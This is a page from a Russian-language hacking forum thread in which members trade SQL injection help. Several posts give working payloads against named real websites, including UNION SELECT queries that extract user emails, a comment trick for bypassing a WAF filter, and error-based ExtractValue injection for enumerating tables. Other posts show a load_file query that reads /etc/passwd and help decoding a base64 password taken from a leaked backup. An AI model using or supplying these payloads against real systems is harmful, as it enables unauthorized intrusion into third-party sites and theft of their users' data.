Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1063 of 1207
  1. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Хм, но update или delete таким способом всё равно не сделать нельзя....... вроде близко бутерброд, а не укусишь)

    Пробовал через скрипт регистрации пользователей, там емейл экранируется только апострофами. Но! Cначала делается select, а только потом запись... и валится на select-е, а не на записи...
     
    #21241 postscripter, 20 Oct 2012
    Last edited: 20 Oct 2012
  2. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Только изучаю SQL Inj. Создал на локалке уязвимый php
    PHP:
    <?php

    $link     mysql_connect("localhost""root""");

    mysql_select_db("site");

    if (!isset(    $_GET['id'])) {

    $result=mysql_query("SELECT * FROM news");

    while (    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

    print     "<a href='mynews.php?id=".$line['id']."'>Новость №".$line['id']."</a><br>";

    }

    exit;

    }

    $query "SELECT text FROM news WHERE id=".$_GET['id'];

         $result mysql_query($query);

    print     "<table>";

        while (    $line mysql_fetch_array($resultMYSQL_ASSOC)) {

            print     "<tr>";

            foreach (    $line as $col_value) {

                print     "<td>$col_value</td>";

            }

            print     "</tr>";

        }

        print     "</table>";

            mysql_free_result($result);

            mysql_close($link);
     
    ?>
    При запросе http://localhost/mynews.php?id=1' вылетает скуля.
    Ради интереса сделал такой запрос http://localhost/mynews.php?id=1; SELECT text FROM news WHERE id=2
    В результате облом, хотя если сделать запрос через консоль SELECT text FROM news WHERE id=1; SELECT text FROM news WHERE id=2; то все ок. В чем проблема?
     
    #21242 WendM, 20 Oct 2012
  3. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    mysql_query не поддерживает мультизапросы
     
    _________________________
    #21243 Expl0ited, 20 Oct 2012
  4. postscripter

    postscripter New Member

    Joined:
    25 Aug 2012
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Подскажите, есть способы обхода такой вот защиты от инжектирования?

    http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1

    http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person
     
    #21244 postscripter, 20 Oct 2012
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union(select+1,email,3,4,5,6+/*!from*/+tbl_person)--+
     
    _________________________
    #21245 Konqi, 20 Oct 2012
  6. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    А почему в данном случае select не попадает под фильтр?
     
    #21246 WendM, 20 Oct 2012
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    потому что ваф фильтрует связку "union+select"
     
    _________________________
    #21247 Konqi, 20 Oct 2012
  8. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-
    '.html
    Не могу раскрутить. Помогите плиз
     
    #21248 WendM, 20 Oct 2012
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1.html
     
    _________________________
    #21249 Konqi, 20 Oct 2012
  10. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    А что делает функция ExtractValue () ?
     
    #21250 WendM, 20 Oct 2012
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue

    подобными вопросами в гугл, не флудим в теме
     
    _________________________
    #21251 Konqi, 20 Oct 2012
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://vk.com/id1'+union+select+1,2,3+--+
    Подскажите как вывести все пароли? Что я делаю не так?
     
    _________________________
    #21252 Expl0ited, 20 Oct 2012
  13. Aplik

    Aplik New Member

    Joined:
    19 Oct 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    В sql бекапе нашел следующую запись
    ('3','dsamir','dGVzdDEyMzQ=','[email protected]','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')

    dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?

    Я только начинаю курить..
     
    #21253 Aplik, 20 Oct 2012
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    Кодировка base64
     
    _________________________
    #21254 Konqi, 20 Oct 2012
  15. Aplik

    Aplik New Member

    Joined:
    19 Oct 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    спасибо
    жалко только пароль не подходит
     
    #21255 Aplik, 20 Oct 2012
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так


    чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
     
    #21256 qaz, 20 Oct 2012
    Last edited: 20 Oct 2012
  17. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Пробовал просто вывести?
    С кавычками играл?
     
    _________________________
    #21257 VY_CMa, 20 Oct 2012
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?

    все что внутри кавычек - называется строкой
    вы пишите текст, потом удивляетесь

    insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))
     
    _________________________
    #21258 Konqi, 20 Oct 2012
    1 person likes this.
  19. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Спасибо еще раз. Но дольше раскрутить не могу.
    Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAME)from(INFORMATION_SCHEMA.TABLES))))='1.html
    Но выдает ошибку 406. Что можно сделать?
     
    #21259 WendM, 21 Oct 2012
  20. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    лимит использовать
     
    _________________________
    #21260 Expl0ited, 21 Oct 2012
(You must log in or sign up to post here.)
Page 1063 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.